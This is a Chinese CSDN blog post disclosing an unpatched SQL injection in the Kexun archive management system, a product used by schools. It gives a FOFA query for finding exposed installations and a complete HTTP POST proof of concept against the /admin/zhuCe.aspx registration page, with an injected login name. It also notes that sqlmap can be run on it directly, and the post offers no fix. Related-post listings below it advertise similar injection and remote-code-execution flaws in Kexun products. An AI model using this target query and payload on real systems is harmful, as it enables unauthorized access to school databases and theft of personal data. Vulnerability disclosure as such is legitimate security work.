科讯档案管理系统存在SQL注入漏洞(0day)

已于 2024-08-26 20:16:38 修改
阅读量69 收藏
点赞数 1
文章标签: 安全
于 2024-08-26 20:04:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77012231/article/details/141572108
版权

漏洞描述
安徽科迅教育装备20年来来始终坚持智慧校园集成方案产品的开发和部署应用,我们有完善的智慧校园和数字校园建设方案,根据不同的学校不同的实际情况量身定做系统集成方案。产品主要是为了实现校园的智慧网络、智慧OA、智慧教学、智慧学习、数字医疗、智慧安防、智慧平台、校园一卡通智慧结算等。科讯档案管理系统多接口存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

 FOFA:

body="安徽省科迅教育装备有限公司 版权所有"

漏洞复现

POC:

POST /admin/zhuCe.aspx HTTP/1.1
Host: 
Content-Length: 1276
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://127.0.0.1/admin/zhuCe.aspx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: Hm_lvt_f8d0a8c400404989e195270b0bbf060a=1722057915,1724161841; ASP.NET_SessionId=cnxjymugm5vz2pewu1wim2i5; CheckCode=2874
Connection: keep-alive

__VIEWSTATE=%2FwEPDwUJOTE2NzUxOTMwD2QWAgIDD2QWAgINDxAPFgYeDURhdGFUZXh0RmllbGQFBE5hbWUeDkRhdGFWYWx1ZUZpZWxkBQJJZB4LXyFEYXRhQm91bmRnZBAVDgnlupPnrqHpg6gP5Lq65Yqb6LWE5rqQ5aSECeWtpueUn%2BWkhA%2Fop4TliJLlj5HlsZXlpIQJ5oub55Sf5aSED%2BWfueiureWwseS4muWkhAnmgLvliqHlpIQP55uR5a%2Bf5a6h6K6h5aSEEuaguOeRnuWKs%2BWKoeWFrOWPuA%2Fln7rnoYDmlZnlrabpg6gP5qC455S15bel56iL57O7GOaVmeiCsuS4juenkeWtpuaKgOacr%2Bezuw%2FkuqTpgJrlt6XnqIvns7sK5YWa5pS%2F5YqeMhUOATEBNgE3ATkCMTACMTECMTICMTMCMTQCMTUCMTYCMTcCMTgCMzAUKwMOZ2dnZ2dnZ2dnZ2dnZ2dkZGRkQ5AxhnFuBQpRovjoynY6l6Jz20JB9%2BK3gZcFAMynfA%3D%3D&__VIEWSTATEGENERATOR=5A8EE21C&__EVENTVALIDATION=%2FwEdABYgUMRUOpnaTvT3MuTcc9EMnIXzDkrCrcbL0RzCfU3JozPzhWZ6gm6le6MUtp6VelIVLCsBEnBJc2CPcvfKwmoXM9KW7XpjHhBuINT5110rU73hoBAJzRZeyqYigwFTnuFy8BGjfquCLoLrVWyeBSOAsjxEOdVYGWgUKkCRqsD%2B8GBeSBtpFcnkARWlh0DiBtTUUI6khBLVHQWydeVVf2Co9CZXvTqeIJBfgJMMaexMGEH3a3QK4%2BERtk5Q60GujGvjgNMYWRz%2BqmMhKoVvbXdgL64n1e00Z3%2BaK3k3w2LHinIdmulgZ3eziAPp0ddszYXSxHrVyknRyG6pkcaz3kGdrnQUC79JcT%2BnHsotSJV5InDCG6sD1npFWRzd77SAvEtqp%2BHgzjKsJIetRcrTTNorOZYVAeSDCngdB4D9FxqIghmk0MkjVEwrXYdpoK2OVqdh2nw8styvTRiSboYiD9A%2BGOzUrqY%2FiCUzL2epOTZ46HlgcfjMYvR73uamwXkck1g%3D&hid_DocumentList=0&hid_type=0&txt_loginName=admin'&txtPwd=1&txtPwd2=1&txt_nickName=1&ddl_bumen=1&btn_save=%E4%BF%9D%E5%AD%98

sqlmap结果:

记录:

看到注册接口我想到的是XSS

 

尝试注册

 猜测用户名带到后端去查询了,尝试sql注入

 没过滤非法字符,sqlmap直接跑

马船长
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
科讯校园一卡通管理系统 多处SQL注入致RCE漏洞复现
0xSec
07-24 2709
科讯校园一卡通管理系统 get_kq_tj_today、dormitoryHealthRanking、DataService.asmx等多处接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
科讯一卡通管理系统get_kq_record存在SQL注入漏洞
xiaokp7的博客
07-24 87
随着信息化技术的不断发展和普及,传统的校园卡已经无法满足学生和学校的需求。学生需要更加便捷、快速的服务,学校需要更加高效、智能的管理方式。因此,智慧校园一卡通系统应运而生。校园一卡通”可广泛用于门禁、图书馆登记、网络教室上机、签到、就餐、消费、圈存等,利用先进的信息技术,逐步实现学校的数字化、网络化、虚拟化和智能化,大力推进教育信息化,加快实现素质教育和教育跨越式发展的战略目标,最终实现“一卡在手,走遍校园”。
科讯一卡通管理系统getRechargeToICCard存在SQL注入漏洞
weixin_43167326的博客
07-22 1024
随着信息化技术的不断发展和普及,传统的校园卡已经无法满足学生和学校的需求。学生需要更加便捷、快速的服务,学校需要更加高效、智能的管理方式。因此,智慧校园一卡通系统应运而生。校园一卡通”可广泛用于门禁、图书馆登记、网络教室上机、签到、就餐、消费、圈存等,利用先进的信息技术,逐步实现学校的数字化、网络化、虚拟化和智能化,大力推进教育信息化,加快实现素质教育和教育跨越式发展的战略目标,最终实现“一卡在手,走遍校园”。
科迅OA办公系统存在SQL注入漏洞
2301_77012231的博客
08-14 193
安徽科迅教育装备20年来来始终坚持智慧校园集成方案产品的开发和部署应用,我们有完善的智慧校园和数字校园建设方案,根据不同的学校不同的实际情况量身定做系统集成方案。产品主要是为了实现校园的智慧网络、智慧OA、智慧教学、智慧学习、数字医疗、智慧安防、智慧平台、校园一卡通智慧结算等。科迅OA办公系统存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
科讯档案管理系统reports_borrow.aspx接口存在SQL注入漏洞
2301_77012231的博客
07-26 211
安徽科迅教育装备20年来来始终坚持智慧校园集成方案产品的开发和部署应用,我们有完善的智慧校园和数字校园建设方案,根据不同的学校不同的实际情况量身定做系统集成方案。产品主要是为了实现校园的智慧网络、智慧OA、智慧教学、智慧学习、数字医疗、智慧安防、智慧平台、校园一卡通智慧结算等。科讯档案管理系统reports_borrow.aspx接口存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。POC。
科迅图书馆云平台SQL注入漏洞
weixin_43167326的博客
05-30 672
JEPaaS 低代码平台 accessToTeanantInfo SQL注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
科讯图书馆综合管理云平台selectbooks.aspx存在SQL注入漏洞
2301_77012231的博客
07-26 265
科讯图书馆综合管理云平台selectbooks.aspx存在SQL注入,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
科迅图书馆云平台 WebCloud.asmx SQL注入致RCE漏洞复现
0xSec
05-30 568
科迅图书馆云平台 WebCloud.asmx接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
C#+SQLServer餐饮管理系统源码
qq_42596789的博客
04-06 3576
基于C# + SQLServer 实现的餐饮管理系统,包含系统登录,点单消费结算,餐台管理,房间管理,预定管理,会员管理,工具,系统设置等模块
科讯后台标准管理系统网站采集作业流程.doc
12-17
科讯后台标准管理系统网站采集作业流程》 在IT行业中,数据采集是一项至关重要的任务,尤其是在构建和维护大型管理系统时。科讯后台标准管理系统旨在高效、准确地收集和处理网络上的信息,为业务决策提供有力支持...
科讯影楼管理系统
07-04
科讯影楼管理系统免费版本
基于Java的科讯人力资源管理系统设计源码
04-07
本项目是一个基于Java语言开发的科讯人力资源管理系统,包含1053个文件,主要文件类型包括CSS样式表、JavaScript脚本、图片、Java源代码、GIF动画、JSP页面、XML配置文件、属性文件、JSON配置文件和图片。...
科讯人力资源管理系统源码
03-28
系统管理、人力资源档案管理、薪酬管理、调动管理、培训管理、激励管理、招聘管理和标准化数据报表八个模块 主要技术: java spring mybatis mysql jsp layui ajax 运行环境: java8 maven3 mysql5.x 项目启动步骤: ...
KesionCMS 科讯万能建站系统 GBK X1.0.150526
10-09
这款CMS(内容管理系统)以其模块化的开发方式和强大的功能集成为业界所熟知,是众多企业和个人建立网站时的首选解决方案。 KesionCMS的核心优势在于其模块化的设计理念。这种设计允许用户根据需求灵活选择和组合...
如何使用双重IP代理实现更安全的网络访问
IPIPGO的博客
08-26 369
双重IP代理,顾名思义,就是在原有的代理IP基础上,再添加一层代理。这样,当你访问目标网站时,数据会先经过第一个代理服务器,再经过第二个代理服务器,最后到达目标网站。这种方式不仅能更好地保护你的隐私,还能有效防止IP被封禁。通过本文的介绍,相信你已经掌握了如何使用Java实现双重IP代理的方法。双重IP代理不仅能帮助我们更好地保护隐私,还能有效防止IP被封。在实际应用中,合理使用双重代理IP,将会使你的网络访问更加安全和高效。希望本文对你有所帮助,祝你在网络技术的道路上越走越远!t=N7T8。
网络安全教程初级简介
网络研究观
08-26 396
网络安全包括一系列技术、流程和实践,用于保护网络、设备、应用程序和数据免受攻击、盗窃或损坏等威胁。
【宝马中国-注册/登录安全分析报告】
08-26 900
宝马中国作为全世界最成功的汽车和摩托车制造商之一的宝马集团旗下公司, 其滑动验证码没有采用市场常用的几家, 有独特的地方, 背景图在被抠出后,并不是采用同行的常用的透明化保留原有图形样式,而是填充白色,所以滑块位置识别需要从背景图中提取, 这样让识别变得更简单,造成这中特点有两方面原因,1 直接填充白色背景的技术比透明度的方式更简单2 从报文看未获取轨迹数据, 显示验证方式中并未验证轨迹,只验证距离是否合适很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
基于视觉识别引擎+深度学习实现安全保障数字化的智慧城管开源了
最新发布
weixin_63598920的博客
08-26 355
智慧城管视觉监控平台是一款功能强大且简单易用的实时算法视频监控系统。它的愿景是最底层打通各大芯片厂商相互间的壁垒,省去繁琐重复的适配流程,实现芯片、算法、应用的全流程组合,从而大大减少企业级应用约95%的开发成本。用户只需在界面上进行简单的操作,就可以实现全视频的接入及布控。
科讯cms 多选sql标签
12-23
科讯CMS是一个功能强大的内容管理系统,其中有丰富的标签功能,可以方便用户进行网站内容的管理和定制。其中,多选SQL标签是一种非常实用的标签,可以在页面中进行多种数据源的选择和展示。 使用多选SQL标签,用户可以方便地从数据库中选择多个数据源,比如文章、产品、用户等,并且可以按照一定的条件筛选出需要的数据进行展示。这样,用户就可以在网站页面上展示多个数据源的内容,为网站的内容丰富性和多样性提供了很大的方便。 在使用多选SQL标签时,用户可以根据自己的需求进行筛选和排序,可以设置不同的展示方式,比如列表展示、瀑布流展示等,满足了用户不同的展示需求。同时,多选SQL标签还提供了丰富的样式定制功能,用户可以根据自己的网站风格进行样式的定制,使得展示的内容更加符合网站整体的风格和需求。 总的来说,科讯CMS的多选SQL标签功能非常强大,可以满足用户在网站内容展示方面的多种需求,为网站的内容管理和展示提供了非常便利的工具和功能,使得用户可以更加灵活地定制和展示网站的内容,提升网站的用户体验和内容质量。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值